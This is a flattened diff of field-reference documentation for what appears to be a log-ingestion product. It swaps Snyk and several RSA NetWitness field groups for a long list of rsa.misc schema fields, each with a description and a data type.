-*`rsa.wireless.wlan_ssid`*:: +*`rsa.misc.inout`*:: + -- -This key is used to capture the ssid of a Wireless Session - type: keyword -- -*`rsa.wireless.access_point`*:: +*`rsa.misc.p_msgid`*:: + -- -This key is used to capture the access point name. - type: keyword -- -*`rsa.wireless.wlan_channel`*:: +*`rsa.misc.data_type`*:: + -- -This is used to capture the channel names - -type: long +type: keyword -- -*`rsa.wireless.wlan_name`*:: +*`rsa.misc.msgIdPart4`*:: + -- -This key captures either WLAN number/name - type: keyword -- - -*`rsa.storage.disk_volume`*:: +*`rsa.misc.error`*:: + -- -A unique name assigned to logical units (volumes) within a physical disk +This key captures All non successful Error codes or responses type: keyword -- -*`rsa.storage.lun`*:: +*`rsa.misc.index`*:: + -- -Logical Unit Number.This key is a very useful concept in Storage. - type: keyword -- -*`rsa.storage.pwwn`*:: +*`rsa.misc.listnum`*:: + -- -This uniquely identifies a port on a HBA. +This key is used to capture listname or listnumber, primarily for collecting access-list type: keyword -- - -*`rsa.physical.org_dst`*:: +*`rsa.misc.ntype`*:: + -- -This is used to capture the destination organization based on the GEOPIP Maxmind database. - type: keyword -- -*`rsa.physical.org_src`*:: +*`rsa.misc.observed_val`*:: + -- -This is used to capture the source organization based on the GEOPIP Maxmind database. +This key captures the Value observed (from the perspective of the device generating the log). type: keyword -- - -*`rsa.healthcare.patient_fname`*:: +*`rsa.misc.policy_value`*:: + -- -This key is for First Names only, this is used for Healthcare predominantly to capture Patients information +This key captures the contents of the policy. This contains details about the policy type: keyword -- -*`rsa.healthcare.patient_id`*:: +*`rsa.misc.pool_name`*:: + -- -This key captures the unique ID for a patient +This key captures the name of a resource pool type: keyword -- -*`rsa.healthcare.patient_lname`*:: +*`rsa.misc.rule_template`*:: + -- -This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information +A default set of parameters which are overlayed onto a rule (or rulename) which efffectively constitutes a template type: keyword -- -*`rsa.healthcare.patient_mname`*:: +*`rsa.misc.count`*:: + -- -This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information - type: keyword -- - -*`rsa.endpoint.host_state`*:: +*`rsa.misc.number`*:: + -- -This key is used to capture the current state of the machine, such as blacklisted, infected, firewall disabled and so on - type: keyword -- -*`rsa.endpoint.registry_key`*:: +*`rsa.misc.sigcat`*:: + -- -This key captures the path to the registry key - type: keyword -- -*`rsa.endpoint.registry_value`*:: +*`rsa.misc.type`*:: + -- -This key captures values or decorators used within a registry entry - type: keyword -- -[[exported-fields-snyk]] -== Snyk fields - -Snyk module - - - -[float] -=== snyk - -Module for parsing Snyk project vulnerabilities. +*`rsa.misc.comments`*:: ++ +-- +Comment information provided in the log message +type: keyword +-- -*`snyk.projects`*:: +*`rsa.misc.doc_number`*:: + -- -Array with all related projects objects. - +This key captures File Identification number -type: flattened +type: long -- -*`snyk.related.projects`*:: +*`rsa.misc.expected_val`*:: + -- -Array of all the related project ID's. - +This key captures the Value expected (from the perspective of the device generating the log). type: keyword -- -[float] -=== audit - -Module for parsing Snyk audit logs. - - - -*`snyk.audit.org_id`*:: +*`rsa.misc.job_num`*:: + -- -ID of the related Organization related to the event. - +This key captures the Job Number type: keyword -- -*`snyk.audit.project_id`*:: +*`rsa.misc.spi_dst`*:: + -- -ID of the project related to the event. - +Destination SPI Index type: keyword -- -*`snyk.audit.content`*:: +*`rsa.misc.spi_src`*:: + -- -Overview of the content that was changed, both old and new values. - +Source SPI Index -type: flattened +type: keyword -- -[float] -=== vulnerabilities - -Module for parsing Snyk project vulnerabilities. - - - -*`snyk.vulnerabilities.cvss3`*:: +*`rsa.misc.code`*:: + -- -CSSv3 scores. - - type: keyword -- -*`snyk.vulnerabilities.disclosure_time`*:: +*`rsa.misc.agent_id`*:: + -- -The time this vulnerability was originally disclosed to the package maintainers. - +This key is used to capture agent id -type: date +type: keyword -- -*`snyk.vulnerabilities.exploit_maturity`*:: +*`rsa.misc.message_body`*:: + -- -The Snyk exploit maturity level. - +This key captures the The contents of the message body. type: keyword -- -*`snyk.vulnerabilities.id`*:: +*`rsa.misc.phone`*:: + -- -The vulnerability reference ID. - - type: keyword -- -*`snyk.vulnerabilities.is_ignored`*:: +*`rsa.misc.sig_id_str`*:: + -- -If the vulnerability report has been ignored. - +This key captures a string object of the sigid variable. -type: boolean +type: keyword -- -*`snyk.vulnerabilities.is_patchable`*:: +*`rsa.misc.cmd`*:: + -- -If vulnerability is fixable by using a Snyk supplied patch. - - -type: boolean +type: keyword -- -*`snyk.vulnerabilities.is_patched`*:: +*`rsa.misc.misc`*:: + -- -If the vulnerability has been patched. - - -type: boolean +type: keyword -- -*`snyk.vulnerabilities.is_pinnable`*:: +*`rsa.misc.name`*:: + -- -If the vulnerability is fixable by pinning a transitive dependency. - - -type: boolean +type: keyword -- -*`snyk.vulnerabilities.is_upgradable`*:: +*`rsa.misc.cpu`*:: + -- -If the vulnerability fixable by upgrading a dependency. - +This key is the CPU time used in the execution of the event being recorded. -type: boolean +type: long -- -*`snyk.vulnerabilities.language`*:: +*`rsa.misc.event_desc`*:: + -- -The package's programming language. - +This key is used to capture a description of an event available directly or inferred type: keyword -- -*`snyk.vulnerabilities.package`*:: +*`rsa.misc.sig_id1`*:: + -- -The package identifier according to its package manager. - +This key captures IDS/IPS Int Signature ID. This must be linked to the sig.id -type: keyword +type: long -- -*`snyk.vulnerabilities.package_manager`*:: +*`rsa.misc.im_buddyid`*:: + -- -The package manager. - - type: keyword -- -*`snyk.vulnerabilities.patches`*:: +*`rsa.misc.im_client`*:: + -- -Patches required to resolve the issue created by Snyk. - - -type: flattened +type: keyword -- -*`snyk.vulnerabilities.priority_score`*:: +*`rsa.misc.im_userid`*:: + -- -The CVS priority score. - - -type: long +type: keyword -- -*`snyk.vulnerabilities.publication_time`*:: +*`rsa.misc.pid`*:: + -- -The vulnerability publication time. +type: keyword +-- -type: date +*`rsa.misc.priority`*:: ++ +-- +type: keyword -- -*`snyk.vulnerabilities.jira_issue_url`*:: +*`rsa.misc.context_subject`*:: + -- -Link to the related Jira issue. - +This key is to be used in an audit context where the subject is the object being identified type: keyword -- -*`snyk.vulnerabilities.original_severity`*:: +*`rsa.misc.context_target`*:: + -- -The original severity of the vulnerability. - - -type: long +type: keyword -- -*`snyk.vulnerabilities.reachability`*:: +*`rsa.misc.cve`*:: + -- -If the vulnerable function from the library is used in the code scanned. Can either be No Info, Potentially reachable and Reachable. - +This key captures CVE (Common Vulnerabilities and Exposures) - an identifier for known information security vulnerabilities. type: keyword -- -*`snyk.vulnerabilities.title`*:: +*`rsa.misc.fcatnum`*:: + -- -The issue title. - +This key captures Filter Category Number. Legacy Usage type: keyword -- -*`snyk.vulnerabilities.type`*:: +*`rsa.misc.library`*:: + -- -The issue type. Can be either "license" or "vulnerability". - +This key is used to capture library information in mainframe devices type: keyword -- -*`snyk.vulnerabilities.unique_severities_list`*:: +*`rsa.misc.parent_node`*:: + -- -A list of related unique severities. - +This key captures the Parent Node Name. Must be related to node variable. type: keyword -- -*`snyk.vulnerabilities.version`*:: +*`rsa.misc.risk_info`*:: + -- -The package version this issue is applicable to. - +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) type: keyword -- -*`snyk.vulnerabilities.introduced_date`*:: +*`rsa.misc.tcp_flags`*:: + -- -The date the vulnerability was initially found. - +This key is captures the TCP flags set in any packet of session -type: date +type: long -- -*`snyk.vulnerabilities.is_fixed`*:: +*`rsa.misc.tos`*:: + -- -If the related vulnerability has been resolved. - +This key describes the type of service -type: boolean +type: long -- -*`snyk.vulnerabilities.credit`*:: +*`rsa.misc.vm_target`*:: + -- -Reference to the person that original found the vulnerability. - +VMWare Target **VMWARE** only varaible. type: keyword -- -*`snyk.vulnerabilities.semver`*:: +*`rsa.misc.workspace`*:: + -- -One or more semver ranges this issue is applicable to. The format varies according to package manager. - +This key captures Workspace Description -type: flattened +type: keyword -- -*`snyk.vulnerabilities.identifiers.alternative`*:: +*`rsa.misc.command`*:: + -- -Additional vulnerability identifiers. - - type: keyword -- -*`snyk.vulnerabilities.identifiers.cwe`*:: +*`rsa.misc.event_category`*:: + -- -CWE vulnerability identifiers. - - type: keyword -- -[[exported-fields-sonicwall]] -== Sonicwall-FW fields - -sonicwall fields. - +*`rsa.misc.facilityname`*:: ++ +-- +type: keyword +-- -*`network.interface.name`*:: +*`rsa.misc.forensic_info`*:: + -- -Name of the network interface where the traffic has been observed. +type: keyword +-- +*`rsa.misc.jobname`*:: ++ +-- type: keyword -- +*`rsa.misc.mode`*:: ++ +-- +type: keyword +-- -*`rsa.internal.msg`*:: +*`rsa.misc.policy`*:: + -- -This key is used to capture the raw message that comes into the Log Decoder - type: keyword -- -*`rsa.internal.messageid`*:: +*`rsa.misc.policy_waiver`*:: + -- type: keyword -- -*`rsa.internal.event_desc`*:: +*`rsa.misc.second`*:: + -- type: keyword -- -*`rsa.internal.message`*:: +*`rsa.misc.space1`*:: + -- -This key captures the contents of instant messages - type: keyword -- -*`rsa.internal.time`*:: +*`rsa.misc.subcategory`*:: + -- -This is the time at which a session hits a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. - -type: date +type: keyword -- -*`rsa.internal.level`*:: +*`rsa.misc.tbdstr2`*:: + -- -Deprecated key defined only in table map. - -type: long +type: keyword -- -*`rsa.internal.msg_id`*:: +*`rsa.misc.alert_id`*:: + -- -This is the Message ID1 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +Deprecated, New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) type: keyword -- -*`rsa.internal.msg_vid`*:: +*`rsa.misc.checksum_dst`*:: + -- -This is the Message ID2 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key is used to capture the checksum or hash of the the target entity such as a process or file. type: keyword -- -*`rsa.internal.data`*:: +*`rsa.misc.checksum_src`*:: + -- -Deprecated key defined only in table map. +This key is used to capture the checksum or hash of the source entity such as a file or process. type: keyword -- -*`rsa.internal.obj_server`*:: +*`rsa.misc.fresult`*:: + -- -Deprecated key defined only in table map. +This key captures the Filter Result -type: keyword +type: long -- -*`rsa.internal.obj_val`*:: +*`rsa.misc.payload_dst`*:: + -- -Deprecated key defined only in table map. +This key is used to capture destination payload type: keyword -- -*`rsa.internal.resource`*:: +*`rsa.misc.payload_src`*:: + -- -Deprecated key defined only in table map. +This key is used to capture source payload type: keyword -- -*`rsa.internal.obj_id`*:: +*`rsa.misc.pool_id`*:: + -- -Deprecated key defined only in table map. +This key captures the identifier (typically numeric field) of a resource pool type: keyword -- -*`rsa.internal.statement`*:: +*`rsa.misc.process_id_val`*:: + -- -Deprecated key defined only in table map. +This key is a failure key for Process ID when it is not an integer value type: keyword -- -*`rsa.internal.audit_class`*:: +*`rsa.misc.risk_num_comm`*:: + -- -Deprecated key defined only in table map. +This key captures Risk Number Community -type: keyword +type: double -- -*`rsa.internal.entry`*:: +*`rsa.misc.risk_num_next`*:: + -- -Deprecated key defined only in table map. +This key captures Risk Number NextGen -type: keyword +type: double -- -*`rsa.internal.hcode`*:: +*`rsa.misc.risk_num_sand`*:: + -- -Deprecated key defined only in table map. +This key captures Risk Number SandBox -type: keyword +type: double -- -*`rsa.internal.inode`*:: +*`rsa.misc.risk_num_static`*:: + -- -Deprecated key defined only in table map. +This key captures Risk Number Static -type: long +type: double -- -*`rsa.internal.resource_class`*:: +*`rsa.misc.risk_suspicious`*:: + -- -Deprecated key defined only in table map. +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) type: keyword -- -*`rsa.internal.dead`*:: +*`rsa.misc.risk_warning`*:: + -- -Deprecated key defined only in table map. +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) -type: long +type: keyword -- -*`rsa.internal.feed_desc`*:: +*`rsa.misc.snmp_oid`*:: + -- -This is used to capture the description of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +SNMP Object Identifier type: keyword -- -*`rsa.internal.feed_name`*:: +*`rsa.misc.sql`*:: + -- -This is used to capture the name of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key captures the SQL query type: keyword -- -*`rsa.internal.cid`*:: +*`rsa.misc.vuln_ref`*:: + -- -This is the unique identifier used to identify a NetWitness Concentrator. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key captures the Vulnerability Reference details type: keyword -- -*`rsa.internal.device_class`*:: +*`rsa.misc.acl_id`*:: + -- -This is the Classification of the Log Event Source under a predefined fixed set of Event Source Classifications. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.device_group`*:: +*`rsa.misc.acl_op`*:: + -- -This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.device_host`*:: +*`rsa.misc.acl_pos`*:: + -- -This is the Hostname of the log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.device_ip`*:: +*`rsa.misc.acl_table`*:: + -- -This is the IPv4 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: ip +type: keyword -- -*`rsa.internal.device_ipv6`*:: +*`rsa.misc.admin`*:: + -- -This is the IPv6 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: ip +type: keyword -- -*`rsa.internal.device_type`*:: +*`rsa.misc.alarm_id`*:: + -- -This is the name of the log parser which parsed a given session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.device_type_id`*:: +*`rsa.misc.alarmname`*:: + -- -Deprecated key defined only in table map. - -type: long +type: keyword -- -*`rsa.internal.did`*:: +*`rsa.misc.app_id`*:: + -- -This is the unique identifier used to identify a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.entropy_req`*:: +*`rsa.misc.audit`*:: + -- -This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration - -type: long +type: keyword -- -*`rsa.internal.entropy_res`*:: +*`rsa.misc.audit_object`*:: + -- -This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration - -type: long +type: keyword -- -*`rsa.internal.event_name`*:: +*`rsa.misc.auditdata`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.feed_category`*:: +*`rsa.misc.benchmark`*:: + -- -This is used to capture the category of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.forward_ip`*:: +*`rsa.misc.bypass`*:: + -- -This key should be used to capture the IPV4 address of a relay system which forwarded the events from the original system to NetWitness. - -type: ip +type: keyword -- -*`rsa.internal.forward_ipv6`*:: +*`rsa.misc.cache`*:: + -- -This key is used to capture the IPV6 address of a relay system which forwarded the events from the original system to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: ip +type: keyword -- -*`rsa.internal.header_id`*:: +*`rsa.misc.cache_hit`*:: + -- -This is the Header ID value that identifies the exact log parser header definition that parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.lc_cid`*:: +*`rsa.misc.cefversion`*:: + -- -This is a unique Identifier of a Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.lc_ctime`*:: +*`rsa.misc.cfg_attr`*:: + -- -This is the time at which a log is collected in a NetWitness Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: date +type: keyword -- -*`rsa.internal.mcb_req`*:: +*`rsa.misc.cfg_obj`*:: + -- -This key is only used by the Entropy Parser, the most common byte request is simply which byte for each side (0 thru 255) was seen the most - -type: long +type: keyword -- -*`rsa.internal.mcb_res`*:: +*`rsa.misc.cfg_path`*:: + -- -This key is only used by the Entropy Parser, the most common byte response is simply which byte for each side (0 thru 255) was seen the most - -type: long +type: keyword -- -*`rsa.internal.mcbc_req`*:: +*`rsa.misc.changes`*:: + -- -This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams - -type: long +type: keyword -- -*`rsa.internal.mcbc_res`*:: +*`rsa.misc.client_ip`*:: + -- -This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams - -type: long +type: keyword -- -*`rsa.internal.medium`*:: +*`rsa.misc.clustermembers`*:: + -- -This key is used to identify if it’s a log/packet session or Layer 2 Encapsulation Type. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. 32 = log, 33 = correlation session, < 32 is packet session - -type: long +type: keyword -- -*`rsa.internal.node_name`*:: +*`rsa.misc.cn_acttimeout`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.nwe_callback_id`*:: +*`rsa.misc.cn_asn_src`*:: + -- -This key denotes that event is endpoint related - type: keyword -- -*`rsa.internal.parse_error`*:: +*`rsa.misc.cn_bgpv4nxthop`*:: + -- -This is a special key that stores any Meta key validation error found while parsing a log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.payload_req`*:: +*`rsa.misc.cn_ctr_dst_code`*:: + -- -This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep - -type: long +type: keyword -- -*`rsa.internal.payload_res`*:: +*`rsa.misc.cn_dst_tos`*:: + -- -This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep - -type: long +type: keyword -- -*`rsa.internal.process_vid_dst`*:: +*`rsa.misc.cn_dst_vlan`*:: + -- -Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the target process. - type: keyword -- -*`rsa.internal.process_vid_src`*:: +*`rsa.misc.cn_engine_id`*:: + -- -Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the source process. - type: keyword -- -*`rsa.internal.rid`*:: +*`rsa.misc.cn_engine_type`*:: + -- -This is a special ID of the Remote Session created by NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: long +type: keyword -- -*`rsa.internal.session_split`*:: +*`rsa.misc.cn_f_switch`*:: + -- -This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.site`*:: +*`rsa.misc.cn_flowsampid`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.size`*:: +*`rsa.misc.cn_flowsampintv`*:: + -- -This is the size of the session as seen by the NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: long +type: keyword -- -*`rsa.internal.sourcefile`*:: +*`rsa.misc.cn_flowsampmode`*:: + -- -This is the name of the log file or PCAPs that can be imported into NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.ubc_req`*:: +*`rsa.misc.cn_inacttimeout`*:: + -- -This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once - -type: long +type: keyword -- -*`rsa.internal.ubc_res`*:: +*`rsa.misc.cn_inpermbyts`*:: + -- -This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once - -type: long +type: keyword -- -*`rsa.internal.word`*:: +*`rsa.misc.cn_inpermpckts`*:: + -- -This is used by the Word Parsing technology to capture the first 5 character of every word in an unparsed log - type: keyword -- - -*`rsa.time.event_time`*:: +*`rsa.misc.cn_invalid`*:: + -- -This key is used to capture the time mentioned in a raw session that represents the actual time an event occured in a standard normalized form - -type: date +type: keyword -- -*`rsa.time.duration_time`*:: +*`rsa.misc.cn_ip_proto_ver`*:: + -- -This key is used to capture the normalized duration/lifetime in seconds. - -type: double +type: keyword -- -*`rsa.time.event_time_str`*:: +*`rsa.misc.cn_ipv4_ident`*:: + -- -This key is used to capture the incomplete time mentioned in a session as a string - type: keyword -- -*`rsa.time.starttime`*:: +*`rsa.misc.cn_l_switch`*:: + -- -This key is used to capture the Start time mentioned in a session in a standard form - -type: date +type: keyword -- -*`rsa.time.month`*:: +*`rsa.misc.cn_log_did`*:: + -- type: keyword -- -*`rsa.time.day`*:: +*`rsa.misc.cn_log_rid`*:: + -- type: keyword -- -*`rsa.time.endtime`*:: +*`rsa.misc.cn_max_ttl`*:: + -- -This key is used to capture the End time mentioned in a session in a standard form - -type: date +type: keyword -- -*`rsa.time.timezone`*:: +*`rsa.misc.cn_maxpcktlen`*:: + -- -This key is used to capture the timezone of the Event Time - type: keyword -- -*`rsa.time.duration_str`*:: +*`rsa.misc.cn_min_ttl`*:: + -- -A text string version of the duration - type: keyword -- -*`rsa.time.date`*:: +*`rsa.misc.cn_minpcktlen`*:: + -- type: keyword -- -*`rsa.time.year`*:: +*`rsa.misc.cn_mpls_lbl_1`*:: + -- type: keyword -- -*`rsa.time.recorded_time`*:: +*`rsa.misc.cn_mpls_lbl_10`*:: + -- -The event time as recorded by the system the event is collected from. The usage scenario is a multi-tier application where the management layer of the system records it's own timestamp at the time of collection from its child nodes. Must be in timestamp format. - -type: date +type: keyword -- -*`rsa.time.datetime`*:: +*`rsa.misc.cn_mpls_lbl_2`*:: + -- type: keyword -- -*`rsa.time.effective_time`*:: +*`rsa.misc.cn_mpls_lbl_3`*:: + -- -This key is the effective time referenced by an individual event in a Standard Timestamp format - -type: date +type: keyword -- -*`rsa.time.expire_time`*:: +*`rsa.misc.cn_mpls_lbl_4`*:: + -- -This key is the timestamp that explicitly refers to an expiration. - -type: date +type: keyword -- -*`rsa.time.process_time`*:: +*`rsa.misc.cn_mpls_lbl_5`*:: + -- -Deprecated, use duration.time - type: keyword -- -*`rsa.time.hour`*:: +*`rsa.misc.cn_mpls_lbl_6`*:: + -- type: keyword -- -*`rsa.time.min`*:: +*`rsa.misc.cn_mpls_lbl_7`*:: + -- type: keyword -- -*`rsa.time.timestamp`*:: +*`rsa.misc.cn_mpls_lbl_8`*:: + -- type: keyword -- -*`rsa.time.event_queue_time`*:: +*`rsa.misc.cn_mpls_lbl_9`*:: + -- -This key is the Time that the event was queued. - -type: date +type: keyword -- -*`rsa.time.p_time1`*:: +*`rsa.misc.cn_mplstoplabel`*:: + -- type: keyword -- -*`rsa.time.tzone`*:: +*`rsa.misc.cn_mplstoplabip`*:: + -- type: keyword -- -*`rsa.time.eventtime`*:: +*`rsa.misc.cn_mul_dst_byt`*:: + -- type: keyword -- -*`rsa.time.gmtdate`*:: +*`rsa.misc.cn_mul_dst_pks`*:: + -- type: keyword -- -*`rsa.time.gmttime`*:: +*`rsa.misc.cn_muligmptype`*:: + -- type: keyword -- -*`rsa.time.p_date`*:: +*`rsa.misc.cn_sampalgo`*:: + -- type: keyword -- -*`rsa.time.p_month`*:: +*`rsa.misc.cn_sampint`*:: + -- type: keyword -- -*`rsa.time.p_time`*:: +*`rsa.misc.cn_seqctr`*:: + -- type: keyword -- -*`rsa.time.p_time2`*:: +*`rsa.misc.cn_spackets`*:: + -- type: keyword -- -*`rsa.time.p_year`*:: +*`rsa.misc.cn_src_tos`*:: + -- type: keyword -- -*`rsa.time.expire_time_str`*:: +*`rsa.misc.cn_src_vlan`*:: + -- -This key is used to capture incomplete timestamp that explicitly refers to an expiration. - type: keyword -- -*`rsa.time.stamp`*:: +*`rsa.misc.cn_sysuptime`*:: + -- -Deprecated key defined only in table map. +type: keyword -type: date +-- +*`rsa.misc.cn_template_id`*:: ++ -- +type: keyword +-- -*`rsa.misc.action`*:: +*`rsa.misc.cn_totbytsexp`*:: + -- type: keyword -- -*`rsa.misc.result`*:: +*`rsa.misc.cn_totflowexp`*:: + -- -This key is used to capture the outcome/result string value of an action in a session. - type: keyword -- -*`rsa.misc.severity`*:: +*`rsa.misc.cn_totpcktsexp`*:: + -- -This key is used to capture the severity given the session - type: keyword -- -*`rsa.misc.event_type`*:: +*`rsa.misc.cn_unixnanosecs`*:: + -- -This key captures the event category type as specified by the event source. - type: keyword -- -*`rsa.misc.reference_id`*:: +*`rsa.misc.cn_v6flowlabel`*:: + -- -This key is used to capture an event id from the session directly - type: keyword -- -*`rsa.misc.version`*:: +*`rsa.misc.cn_v6optheaders`*:: + -- -This key captures Version of the application or OS which is generating the event. - type: keyword -- -*`rsa.misc.disposition`*:: +*`rsa.misc.comp_class`*:: + -- -This key captures the The end state of an action. - type: keyword -- -*`rsa.misc.result_code`*:: +*`rsa.misc.comp_name`*:: + -- -This key is used to capture the outcome/result numeric value of an action in a session - type: keyword -- -*`rsa.misc.category`*:: +*`rsa.misc.comp_rbytes`*:: + -- -This key is used to capture the category of an event given by the vendor in the session - type: keyword -- -*`rsa.misc.obj_name`*:: +*`rsa.misc.comp_sbytes`*:: + -- -This is used to capture name of object - type: keyword -- -*`rsa.misc.obj_type`*:: +*`rsa.misc.cpu_data`*:: + -- -This is used to capture type of object - type: keyword -- -*`rsa.misc.event_source`*:: +*`rsa.misc.criticality`*:: + -- -This key captures Source of the event that’s not a hostname - type: keyword -- -*`rsa.misc.log_session_id`*:: +*`rsa.misc.cs_agency_dst`*:: + -- -This key is used to capture a sessionid from the session directly - type: keyword -- -*`rsa.misc.group`*:: +*`rsa.misc.cs_analyzedby`*:: + -- -This key captures the Group Name value - type: keyword -- -*`rsa.misc.policy_name`*:: +*`rsa.misc.cs_av_other`*:: + -- -This key is used to capture the Policy Name only. - type: keyword -- -*`rsa.misc.rule_name`*:: +*`rsa.misc.cs_av_primary`*:: + -- -This key captures the Rule Name - type: keyword -- -*`rsa.misc.context`*:: +*`rsa.misc.cs_av_secondary`*:: + -- -This key captures Information which adds additional context to the event. - type: keyword -- -*`rsa.misc.change_new`*:: +*`rsa.misc.cs_bgpv6nxthop`*:: + -- -This key is used to capture the new values of the attribute that’s changing in a session - type: keyword -- -*`rsa.misc.space`*:: +*`rsa.misc.cs_bit9status`*:: + -- type: keyword -- -*`rsa.misc.client`*:: +*`rsa.misc.cs_context`*:: + -- -This key is used to capture only the name of the client application requesting resources of the server. See the user.agent meta key for capture of the specific user agent identifier or browser identification string. - type: keyword -- -*`rsa.misc.msgIdPart1`*:: +*`rsa.misc.cs_control`*:: + -- type: keyword -- -*`rsa.misc.msgIdPart2`*:: +*`rsa.misc.cs_data`*:: + -- type: keyword -- -*`rsa.misc.change_old`*:: +*`rsa.misc.cs_datecret`*:: + -- -This key is used to capture the old value of the attribute that’s changing in a session - type: keyword -- -*`rsa.misc.operation_id`*:: +*`rsa.misc.cs_dst_tld`*:: + -- -An alert number or operation number. The values should be unique and non-repeating. - type: keyword -- -*`rsa.misc.event_state`*:: +*`rsa.misc.cs_eth_dst_ven`*:: + -- -This key captures the current state of the object/item referenced within the event. Describing an on-going event. - type: keyword -- -*`rsa.misc.group_object`*:: +*`rsa.misc.cs_eth_src_ven`*:: + -- -This key captures a collection/grouping of entities. Specific usage - type: keyword -- -*`rsa.misc.node`*:: +*`rsa.misc.cs_event_uuid`*:: + -- -Common use case is the node name within a cluster. The cluster name is reflected by the host name. - type: keyword -- -*`rsa.misc.rule`*:: +*`rsa.misc.cs_filetype`*:: + -- -This key captures the Rule number - type: keyword -- -*`rsa.misc.device_name`*:: +*`rsa.misc.cs_fld`*:: + -- -This is used to capture name of the Device associated with the node Like: a physical disk, printer, etc - type: keyword -- -*`rsa.misc.param`*:: +*`rsa.misc.cs_if_desc`*:: + -- -This key is the parameters passed as part of a command or application, etc. - type: keyword -- -*`rsa.misc.change_attrib`*:: +*`rsa.misc.cs_if_name`*:: + -- -This key is used to capture the name of the attribute that’s changing in a session - type: keyword -- -*`rsa.misc.event_computer`*:: +*`rsa.misc.cs_ip_next_hop`*:: + -- -This key is a windows only concept, where this key is used to capture fully qualified domain name in a windows log. - type: keyword -- -*`rsa.misc.reference_id1`*:: +*`rsa.misc.cs_ipv4dstpre`*:: + -- -This key is for Linked ID to be used as an addition to "reference.id" - type: keyword -- -*`rsa.misc.event_log`*:: +*`rsa.misc.cs_ipv4srcpre`*:: + -- -This key captures the Name of the event log - type: keyword -- -*`rsa.misc.OS`*:: +*`rsa.misc.cs_lifetime`*:: + -- -This key captures the Name of the Operating System - type: keyword -- -*`rsa.misc.terminal`*:: +*`rsa.misc.cs_log_medium`*:: + -- -This key captures the Terminal Names only - type: keyword -- -*`rsa.misc.msgIdPart3`*:: +*`rsa.misc.cs_loginname`*:: + -- type: keyword -- -*`rsa.misc.filter`*:: +*`rsa.misc.cs_modulescore`*:: + -- -This key captures Filter used to reduce result set - type: keyword -- -*`rsa.misc.serial_number`*:: +*`rsa.misc.cs_modulesign`*:: + -- -This key is the Serial number associated with a physical asset. - type: keyword -- -*`rsa.misc.checksum`*:: +*`rsa.misc.cs_opswatresult`*:: + -- -This key is used to capture the checksum or hash of the entity such as a file or process. Checksum should be used over checksum.src or checksum.dst when it is unclear whether the entity is a source or target of an action. - type: keyword -- -*`rsa.misc.event_user`*:: +*`rsa.misc.cs_payload`*:: + -- -This key is a windows only concept, where this key is used to capture combination of domain 